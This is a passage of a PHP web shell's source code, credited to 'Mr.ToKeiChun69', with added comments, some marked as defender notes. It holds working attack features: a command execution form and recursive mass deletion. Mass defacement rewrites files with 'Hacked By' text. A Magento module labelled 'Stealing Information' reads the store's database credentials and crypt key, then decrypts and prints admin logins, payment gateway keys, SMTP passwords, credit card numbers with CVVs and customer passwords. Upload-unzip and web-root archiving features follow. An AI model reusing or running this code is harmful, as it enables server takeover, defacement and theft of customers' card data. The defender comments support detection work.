  585. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  586. echo "<li>[ <a href='?dir=$dir&do=metu'>Logout</a> ]<br></li>";
  587. echo "</ul>";
  588. echo "</center>";
  589. echo "<hr>";
  590. if($_GET['do'] == 'mass_delete') {
  // hapus_massal() ("mass delete"): when $dir is writable, walks scandir($dir) and
  // - for ".": unlinks $dir/$namafile if it exists;
  // - for "..": unlinks $namafile in the parent of $dir if it exists;
  // - for each writable sub-directory that contains $namafile: prints a DELETED
  //   line, unlinks the file and recurses into that sub-directory.
  // Recursion only continues below directories where the file was found.
  // Returns nothing; $idx receives null. Paths are echoed unescaped.
  // Defined conditionally inside the do=mass_delete branch.
  591. function hapus_massal($dir,$namafile) {
  592. if(is_writable($dir)) {
  593. $dira = scandir($dir);
  594. foreach($dira as $dirb) {
  595. $dirc = "$dir/$dirb";
  596. $lokasi = $dirc.'/'.$namafile;
  597. if($dirb === '.') {
  598. if(file_exists("$dir/$namafile")) {
  599. unlink("$dir/$namafile");
  600. }
  601. } elseif($dirb === '..') {
  602. if(file_exists("".dirname($dir)."/$namafile")) {
  603. unlink("".dirname($dir)."/$namafile");
  604. }
  605. } else {
  606. if(is_dir($dirc)) {
  607. if(is_writable($dirc)) {
  608. if(file_exists($lokasi)) {
  609. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  610. unlink($lokasi);
  611. $idx = hapus_massal($dirc,$namafile);
  612. }
  613. }
  614. }
  615. }
  616. }
  617. }
  618. }
  619. if($_POST['start']) {
  620. echo "<div style='margin: 5px auto; padding: 5px'>";
  621. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  622. echo "</div>";
  623. } else {
  624. echo "<center>";
  625. echo "<form method='post'>
  626. <font style='text-decoration: underline;'>Folder:</font><br>
  627. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  628. <font style='text-decoration: underline;'>Filename:</font><br>
  629. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  630. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  631. </form></center>";
  632. }
  633. } elseif($_GET['do'] == 'cmd') {
  634. echo "<form method='post'>
  635. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  636. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  637. </form>";
  638. if($_POST['do_cmd']) {
  639. echo "<pre>".exe($_POST['cmd'])."</pre>";
  640. }
  641. } elseif($_GET['do'] == 'mass_deface') {
  642. echo "<center><form action=\"\" method=\"post\">\n";
  643. $dirr=$_POST['d_dir'];
  644. $index = $_POST["script"];
  645. $index = str_replace('"',"'",$index);
  646. $index = stripslashes($index);
  // edit_file(): when $file is writable, replaces its contents with $index through
  // clear_fill() and prints a success line; otherwise prints a failure line.
  // No return value.
  647. function edit_file($file,$index){
  648. if (is_writable($file)) {
  649. clear_fill($file,$index);
  650. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  651. }
  652. else {
  653. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  654. }
  655. }
  // hapus_massal() ("mass delete"), second copy: same statements as the definition
  // in the do=mass_delete branch. This one is declared inside the do=mass_deface
  // branch, so only one of the two is defined for a given request.
  // When $dir is writable it unlinks $namafile in $dir, in the parent of $dir, and
  // in each writable sub-directory that contains it, recursing into those
  // sub-directories and printing a DELETED line per file. Returns nothing.
  656. function hapus_massal($dir,$namafile) {
  657. if(is_writable($dir)) {
  658. $dira = scandir($dir);
  659. foreach($dira as $dirb) {
  660. $dirc = "$dir/$dirb";
  661. $lokasi = $dirc.'/'.$namafile;
  662. if($dirb === '.') {
  663. if(file_exists("$dir/$namafile")) {
  664. unlink("$dir/$namafile");
  665. }
  666. } elseif($dirb === '..') {
  667. if(file_exists("".dirname($dir)."/$namafile")) {
  668. unlink("".dirname($dir)."/$namafile");
  669. }
  670. } else {
  671. if(is_dir($dirc)) {
  672. if(is_writable($dirc)) {
  673. if(file_exists($lokasi)) {
  674. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  675. unlink($lokasi);
  676. $idx = hapus_massal($dirc,$namafile);
  677. }
  678. }
  679. }
  680. }
  681. }
  682. }
  683. }
  // clear_fill(): if $file exists, opens it in 'w' mode (which truncates it),
  // writes an empty string and then $index, and closes the handle.
  // The previous content is not kept anywhere by this function.
  684. function clear_fill($file,$index){
  685. if(file_exists($file)){
  686. $handle = fopen($file,'w');
  687. fwrite($handle,'');
  688. fwrite($handle,$index);
  689. fclose($handle); } }
  690.  
  // gass(): using the globals $dirr (target directory) and $index (replacement
  // content), changes into $dirr and passes every non-directory entry to
  // edit_file(), except this script's own file name and the names in $notallow.
  // Prints one line per file and a final count. Only the top level of $dirr is
  // touched; there is no recursion here.
  // Effect on disk: many files in one directory rewritten with identical content
  // in a single request, which file-integrity monitoring will show as a burst.
  691. function gass(){
  692. global $dirr , $index ;
  693. chdir($dirr);
  694. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  695. $files = scandir($dirr) ;
  696. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  697. sort($files);
  698. $n = 0 ;
  699. foreach ($files as $file){
  700. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  701. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  702. edit_file($file,$index);
  703. flush();
  704. $n = $n +1 ;
  705. }
  706. }
  707. echo "<br>";
  708. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  709. }
  // ListFiles(): recursively collects the paths of all files under $dirrall and
  // returns them as a flat array. Entries whose name starts with "." and names in
  // $notallow (which includes this script's own file name) are skipped.
  // Returns nothing (null) when opendir() fails. The loop stops at the first
  // entry whose name is falsy, because readdir()'s result is tested loosely.
  710. function ListFiles($dirrall) {
  711.  
  712. if($dh = opendir($dirrall)) {
  713.  
  714. $files = Array();
  715. $inner_files = Array();
  716. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  717. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  718. while($file = readdir($dh)) {
  719. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  720. if(is_dir($dirrall . "/" . $file)) {
  721. $inner_files = ListFiles($dirrall . "/" . $file);
  722. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  723. } else {
  724. array_push($files, $dirrall . "/" . $file);
  725. }
  726. }
  727. }
  728.  
  729. closedir($dh);
  730. return $files;
  731. }
  732. }
  // gass_all(): recursive variant of gass(). Takes the target directory from
  // $_POST['d_dir'], lists every file beneath it with ListFiles(), and passes each
  // one to edit_file() with the global $index as the new content. Prints one line
  // per file and a final count derived from the last array key.
  733. function gass_all(){
  734. global $index ;
  735. $dirrall=$_POST['d_dir'];
  736. foreach (ListFiles($dirrall) as $key=>$file){
  737. $file = str_replace('//',"/",$file);
  738. echo "<center><strong>$file</strong> ===>";
  739. edit_file($file,$index);
  740. flush();
  741. }
  742. $key = $key+1;
  743. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  // sabun_massal(): when $dir is writable, writes $isi_script (script contents) to
  // a file named $namafile (file name) in $dir (via the "." entry), in the parent
  // of $dir (via ".."), and in every writable sub-directory, recursing into each
  // of those sub-directories. Existing files of that name are overwritten by
  // file_put_contents(). Prints a DONE line per sub-directory; returns nothing.
  // Effect on disk: the same file name with identical content appearing across a
  // directory tree, including one level above the starting directory.
  744. function sabun_massal($dir,$namafile,$isi_script) {
  745. if(is_writable($dir)) {
  746. $dira = scandir($dir);
  747. foreach($dira as $dirb) {
  748. $dirc = "$dir/$dirb";
  749. $lokasi = $dirc.'/'.$namafile;
  750. if($dirb === '.') {
  751. file_put_contents($lokasi, $isi_script);
  752. } elseif($dirb === '..') {
  753. file_put_contents($lokasi, $isi_script);
  754. } else {
  755. if(is_dir($dirc)) {
  756. if(is_writable($dirc)) {
  757. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  758. file_put_contents($lokasi, $isi_script);
  759. $idx = sabun_massal($dirc,$namafile,$isi_script);
  760. }
  761. }
  762. }
  763. }
  764. }
  765. }
  // Dispatcher for the POSTed 'mass' action of this shell's mass-overwrite menu.
  // Defender note: every input here ($_POST d_dir, d_file, script) is attacker-supplied, and the
  // effect of the 'onedir' action is to write the same content under the same filename into many
  // directories. Indicators visible on this page: the default filename 'readthis.html' and the
  // default body text in the form below. A burst of identically named, identical-hash files
  // appearing across sibling directories is the pattern file-integrity monitoring should alert on.
  766. if($_POST['mass'] == 'onedir') {
  // First pass: results are printed as plain URLs inside a <textarea> ("Versi Text Area" = text-area version).
  767. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  768. $ini="http://";
  769. $mainpath=$_POST[d_dir];
  770. $file=$_POST[d_file];
  771. $dir=opendir("$mainpath");
  // base64_encode() followed immediately by base64_decode() is a round trip: $indx equals the POSTed 'script' value.
  772. $code=base64_encode($_POST[script]);
  773. $indx=base64_decode($code);
  // For each directory entry, try to create/truncate "<entry>/<file>" ("w+") and write the content;
  // errors are suppressed with @ and only successful writes are echoed.
  774. while($row=readdir($dir)){
  775. $start=@fopen("$row/$file","w+");
  776. $finish=@fwrite($start,$indx);
  777. if ($finish){
  778. echo"$ini$row/$file\n";
  779. }
  780. }
  // Second pass: the same open/write loop is repeated, this time printing clickable links ("Versi Text" = text version).
  781. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  782. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  783. $dir=opendir("$mainpath");
  784. $code=base64_encode($_POST[script]);
  785. $indx=base64_decode($code);
  786. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  787. $finish=@fwrite($start,$indx);
  788. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  789. }
  790.  
  791. }
  // The remaining actions delegate to gass(), hapus_massal(), gass_all() and sabun_massal(),
  // which are defined outside this part of the listing; their behaviour cannot be confirmed from here.
  792. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  793. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  794. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  795. elseif($_POST['mass'] == 'massdeface') {
  796. echo "<div style='margin: 5px auto; padding: 5px'>";
  797. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  798. echo "</div>"; }
  // No recognised action: render the menu form (action selector, folder, filename, content).
  799. else {
  800. echo "
  801. <center><font style='text-decoration: underline;'>
  802. Select Type:<br>
  803. </font>
  804. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  805. <option value=\"onedir\">Mass Deface 1 Dir</option>
  806. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  807. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  808. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  809. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  810. <font style='text-decoration: underline;'>Folder:</font><br>
  811. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  812. <font style='text-decoration: underline;'>Filename:</font><br>
  813. <input type='text' name='d_file' value='readthis.html' style='width: 450px;' height='10'><br>
  814. <font style='text-decoration: underline;'>Index File:</font><br>
  815. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.ToKeiChun69</textarea><br>
  816. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  817. </form></center>";
  818. }
  819. }
  820. elseif($_GET['do'] == 'magen') {
  821. echo'
  822. <div id="page-wrap">
  823. <center>
  824. <br>
  825. <FORM action="" method="post">
  826. <div align="center">[M A G E N T O] - Stealing Information<br>
  827. <div align="center">coder: sohai & n4KuLa_<br>
  828. <input type="hidden" name="form_action" value="2">
  829. </div>
  830. </div>
  831. ';
  832.  
  833.  
  834. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  835. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  836. if(isset($xml->global->resources->default_setup->connection)) {
  837. $connection = $xml->global->resources->default_setup->connection;
  838. $prefix = $xml->global->resources->db->table_prefix;
  839. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  840. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  841.  
  842. try {
  843. $app = Mage::app('default');
  844. Mage::getSingleton('core/session', array('name'=>'frontend'));
  845. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  846.  
  847. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  848. print("Could not connect: " . mysql_error());
  849. }
  850. mysql_select_db($connection->dbname);
  851. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  852.  
  853. $crypto = new Varien_Crypt_Mcrypt();
  854. $crypto->init($key);
  855.  
  856. //=========================================================================================================
  857. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  858. if (!$query){
  859. echo "<center><b>Gagal</b></center>";
  860. }else{
  861. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  862. echo'<br><br>
  863. ====================================================================<br>
  864. [ Admin FROM website : '.$site['website'].'] <br>
  865. ====================================================================<br>';
  866. }
  867. echo "
  868. <table border='1' align='center' >
  869. <tr>
  870. <td>id</td>
  871. <td>firstname</td>
  872. <td>lastname</td>
  873. <td>email</td>
  874. <td>username</td>
  875. <td>password</td>
  876. </tr>";
  877. while($vx = mysql_fetch_array($query)) {
  878. $no = 1;
  879. $user_id = $vx['user_id'];
  880. $username = $vx['username'];
  881. $password = $vx['password'];
  882. $email = $vx['email'];
  883. $firstname = $vx['firstname'];
  884. $lastname = $vx['lastname'];
  885. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  886. }
  887. echo "</table><br>";
  888. //=========================================================================================================
  889. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  890. if(mysql_num_rows($query) != 0){
  891. if (!$query){
  892. echo "<center><b>Gagal</b></center>";
  893. }else{
  894. echo'<br><br>
  895. ====================================================================<br>
  896. [ Authorizenet ] <br>
  897. ====================================================================<br>';
  898. }
  899. echo "
  900. <table border='1' align='center' >
  901. <tr>
  902. <td>no</td>
  903. <td>user</td>
  904. <td>pass</td>
  905. </tr>";
  906. $no = 1;
  907. while($vx = mysql_fetch_array($query)) {
  908. $user = $crypto->decrypt($vx['user']);
  909. $pass = $crypto->decrypt($vx['pass']);
  910.  
  911.  
  912. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  913. $no++;
  914. }
  915. echo "</table><br>";
  916. }
  917. //=========================================================================================================
  918. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  919. if(mysql_num_rows($query_smtp) != 0){
  920. if (!$query_smtp){
  921. echo "<center><b>Gagal</b></center>";
  922. }else{
  923. echo'<br><br>
  924. ====================================================================<br>
  925. [ SMTP ] <br>
  926. ====================================================================<br>';
  927. }
  928. echo "
  929. <table border='1' align='center' >
  930. <tr>
  931. <td>no</td>
  932. <td>host</td>
  933. <td>port</td>
  934. <td>user</td>
  935. <td>pass</td>
  936. </tr>";
  937. $no = 1;
  938. $batas = 0;
  939. while($rows = mysql_fetch_array($query_smtp)) {
  940. $smtphost = $rows[0];
  941. $smtpport = $rows[1];
  942. $smtpuser = $rows[2];
  943. $smtppass = $rows[3];
  944. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  945. $no++;
  946. }
  947. echo "</table><br>";
  948. }
  949. //=========================================================================================================
  950. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  951. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  952. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  953. echo'<br><br>
  954. ====================================================================<br>
  955. [ Credit Card ] <br>
  956. ====================================================================<br>';
  957. echo "
  958. <table border='1' align='left' >
  959. <tr>
  960. <td>no</td>
  961. <td>Date</td>
  962. <td>Credit Owner</td>
  963. <td>method</td>
  964. <td>Credit Number</td>
  965. <td>Credit Exp</td>
  966. <td>CVV</td>
  967. <td>Address</td>
  968. </tr>";
  969. $no = 1;
  970. $batas = 0;
  971. while($vx = mysql_fetch_array($query)){
  972. $date = $vx['updated_at'];
  973. $cc_owner = $vx['cc_owner'];
  974. $method = $vx['method'];
  975. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  976. $exp = $vx['exp'];
  977. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  978. $Billing_Address = $vx['Billing Address'];
  979. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  980. $batas = $no++;
  981. }
  982.  
  983. while($vx2 = mysql_fetch_array($query2)){
  984. $batas +=1;
  985. $cc_owner = $vx2['cc_owner'];
  986. $method = $vx2['method'];
  987. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  988. $exp = $vx2['exp'];
  989. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  990. $Billing_Address = $vx2['Billing Address'];
  991. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  992. $batas++;
  993. }
  994.  
  995. echo "</table><br>";
  996. }
  997. //=========================================================================================================
  998. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  999. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  1000.  
  1001.  
  1002. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  1003. if (!$query){
  1004. echo "<center><b>Gagal</b></center>";
  1005. }else{
  1006. echo'<br><br>
  1007. ====================================================================<br>
  1008. [ Customer ] <br>
  1009. ====================================================================<br>';
  1010. }
  1011. echo "
  1012. <table border='1' align='center' >
  1013. <tr>
  1014. <td>no</td>
  1015. <td>user</td>
  1016. <td>pass</td>
  1017. </tr>";
  1018. $no = 1;
  1019. $batas = 0;
  1020. while($vx = mysql_fetch_array($query)) {
  1021. $user = $vx['email'];
  1022. $pass = $vx['value'];
  1023. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  1024. $batas = $no++;
  1025. }
  1026.  
  1027. if(mysql_num_rows($query2) != 0 && ($query2)){
  1028. while($vx2 = mysql_fetch_array($query2)){
  1029. $user = $vx2['customer_email'];
  1030. $pass = $crypto->decrypt($vx2['password_hash']);
  1031. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  1032. $batas +=1;
  1033. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  1034. $batas++;
  1035. }
  1036. }
  1037. }
  1038.  
  1039. echo "</table><br>";
  1040. }
  1041. //=========================================================================================================
  1042. }
  1043. }
  // Appends $data to the file at path $format (opened in append mode) and closes the handle.
  // The fopen() result is not checked before it is passed to fwrite()/fclose().
  // No caller of save() is visible in this part of the listing.
  1044. function save($format,$data){
  1045. $fp = fopen($format, 'a');
  1046. fwrite($fp, $data);
  1047. fclose($fp);
  1048. }
  // Heuristic "is this string base64?" check. Returns true only when all three tests pass:
  //   1. $string consists of base64 alphabet characters (plus CR/LF) with at most two trailing '='
  //   2. strict base64_decode() yields a truthy value (so an empty or "0" result is rejected)
  //   3. re-encoding the decoded bytes reproduces $string (loose != comparison)
  // No caller of cekbase64() is visible in this part of the listing.
  1049. function cekbase64($string){
  1050. $decoded = base64_decode($string, true);
  1051. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  1052. if(!base64_decode($string, true)) return false;
  1053. if(base64_encode($decoded) != $string) return false;
  1054. return true;// the return value is 1 (true) when the string passes
  1055. }
  1056. //---- used to decode (decrypt) stored passwords ---/
  // Blowfish/ECB encrypt-decrypt wrapper built on the legacy mcrypt extension
  // (mcrypt was removed from PHP core in 7.2, so this code only runs on older stacks).
  // Defender note: in this listing the class is instantiated in the 'magen' branch, initialised
  // with the crypt key read from app/etc/local.xml, and used to decrypt payment, gateway and
  // customer fields pulled from the store database. A readable local.xml therefore exposes every
  // value encrypted with that key; if this file is found on a host, treat the key and the data it
  // protects as compromised and rotate accordingly.
  // $this->handler is assigned in init() without a declared property.
  1057. class Varien_Crypt_Mcrypt{
  1058. /**
  1059. * Constructor
  1060. *
  1061. * Takes no arguments and performs no setup; init() must be called before encrypt()/decrypt().
  1062. */
  1063. public function __construct()
  1064. {
  1065. }
  1066.  
  1067. /**
  1068. * Initialize mcrypt module (Blowfish cipher, ECB mode) and bind the key to the handle
  1069. *
  1070. * @param string $key cipher private key
  1071. * @return Varien_Crypt_Mcrypt|null $this on success, null when $key is longer than the cipher's maximum key size
  1072. */
  1073. public function init($key)
  1074. {
  1075. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  // ECB does not use an IV; one is still generated because mcrypt_generic_init() takes an IV argument.
  1076. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  1077. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  1078.  
  // Key length is measured in UTF-8 characters, not bytes.
  1079. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  1080. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  1081. return null;
  1082. }
  1083.  
  1084. mcrypt_generic_init($this->handler, $key, $iv);
  1085.  
  1086. return $this;
  1087. }
  1088.  
  1089. /**
  1090. * Encrypt data and return it base64-encoded
  1091. *
  1092. * @param string $data source string
  1093. * @return string|null base64 ciphertext; $data unchanged when it is empty; null when init() has not set the handler
  1094. */
  1095. public function encrypt($data)
  1096. {
  1097. if (!$this->handler) {
  1098. //throw new Varien_Exception('Crypt module is not initialized.');
  1099. return null;
  1100. }
  1101. if (strlen($data) == 0) {
  1102. return $data;
  1103. }
  1104. return base64_encode(mcrypt_generic($this->handler, $data));
  1105. }
  1106.  
  1107. /**
  1108. * Decrypt base64-encoded ciphertext
  1109. *
  1110. * @param string $data encrypted string
  1111. * @return string|null raw mdecrypt_generic() output; $data unchanged when it is empty; null when init() has not set the handler
  1112. */
  1113. public function decrypt($data)
  1114. {
  1115. if (!$this->handler) {
  1116. //throw new Varien_Exception('Crypt module is not initialized.');
  1117. return null;
  1118. }
  1119. if (strlen($data) == 0) {
  1120. return $data;
  1121. }
  1122. return mdecrypt_generic($this->handler, base64_decode($data));
  1123. }
  1124.  
  1125.  
  1126. /**
  1127. * Destruct cipher module: releases the mcrypt handle if one was opened
  1128. *
  1129. */
  1130. public function __destruct()
  1131. {
  1132. if ($this->handler) {
  1133. $this->_reset();
  1134. }
  1135. }
  1136.  
  // Deinitialises and closes the mcrypt module handle.
  1137. protected function _reset()
  1138. {
  1139. mcrypt_generic_deinit($this->handler);
  1140. mcrypt_module_close($this->handler);
  1141. }
  1142. }
  1143. }
  1144. elseif($_GET['do'] == 'zip') {
  1145. echo "<center><h1>Zip Menu</h1>";
  // Recursively deletes everything under $dir and then removes $dir itself.
  // In this listing it is called on a target directory whose name is derived from the uploaded
  // archive's filename, immediately before that directory is recreated with mode 0777.
  // Return values of unlink()/rmdir() are not checked.
  1146. function rmdir_recursive($dir) {
  1147. foreach(scandir($dir) as $file) {
  // Skip the self and parent entries so the walk cannot climb out of $dir.
  1148. if ('.' === $file || '..' === $file) continue;
  1149. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1150. else unlink("$dir/$file");
  1151. }
  1152. rmdir($dir);
  1153. }
  1154. if($_FILES["zip_file"]["name"]) {
  1155. $filename = $_FILES["zip_file"]["name"];
  1156. $source = $_FILES["zip_file"]["tmp_name"];
  1157. $type = $_FILES["zip_file"]["type"];
  1158. $name = explode(".", $filename);
  1159. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1160. foreach($accepted_types as $mime_type) {
  1161. if($mime_type == $type) {
  1162. $okay = true;
  1163. break;
  1164. }
  1165. }
  1166. $continue = strtolower($name[1]) == 'zip' ? true : false;
  1167. if(!$continue) {
  1168. $message = "Itu Bukan Zip , , GOBLOK COK";
  1169. }
  1170. $path = dirname(__FILE__).'/';
  1171. $filenoext = basename ($filename, '.zip');
  1172. $filenoext = basename ($filenoext, '.ZIP');
  1173. $targetdir = $path . $filenoext;
  1174. $targetzip = $path . $filename;
  1175. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  1176. mkdir($targetdir, 0777);
  1177. if(move_uploaded_file($source, $targetzip)) {
  1178. $zip = new ZipArchive();
  1179. $x = $zip->open($targetzip);
  1180. if ($x === true) {
  1181. $zip->extractTo($targetdir);
  1182. $zip->close();
  1183.  
  1184. unlink($targetzip);
  1185. }
  1186. $message = "<b>Sukses Gan :)</b>";
  1187. } else {
  1188. $message = "<b>Error Gan :(</b>";
  1189. }
  1190. }
  1191. echo '<table style="width:100%" border="1">
  1192. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1193. <label>Zip File : <input type="file" name="zip_file" /></label>
  1194. <input type="submit" name="submit" value="Upload And Unzip" />
  1195. </form>';
  1196. if($message) echo "<p>$message</p>";
  1197. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1198. if($_POST['backup']){
  1199. $save=$_POST['save'];
  // Archives $source (a file or a directory tree) into a zip file at $destination.
  // Returns the result of ZipArchive::close() when the zip extension is loaded and $source exists;
  // returns false otherwise.
  // Defender note: in this listing both arguments come straight from POST fields ('dir' and 'save'),
  // and the form pre-fills the output name 'tkc_backup.zip' in the current directory. An unexpected
  // archive of the web root inside a web-served path is a data-staging indicator worth searching for.
  1200. function Zip($source, $destination)
  1201. {
  1202. if (extension_loaded('zip') === true)
  1203. {
  1204. if (file_exists($source) === true)
  1205. {
  1206. $zip = new ZipArchive();
  1207.  
  1208. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1209. {
  // Canonicalise so the prefix stripped below matches the realpath() of each entry.
  1210. $source = realpath($source);
  1211.  
  1212. if (is_dir($source) === true)
  1213. {
  1214. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1215.  
  1216. foreach ($files as $file)
  1217. {
  1218. $file = realpath($file);
  1219.  
  // Entry names are made relative by removing the "$source/" prefix from each path.
  1220. if (is_dir($file) === true)
  1221. {
  1222. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1223. }
  1224.  
  // Each file is read fully into memory before being added to the archive.
  1225. else if (is_file($file) === true)
  1226. {
  1227. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1228. }
  1229. }
  1230. }
  1231.  
  // Single-file source: stored under its base name.
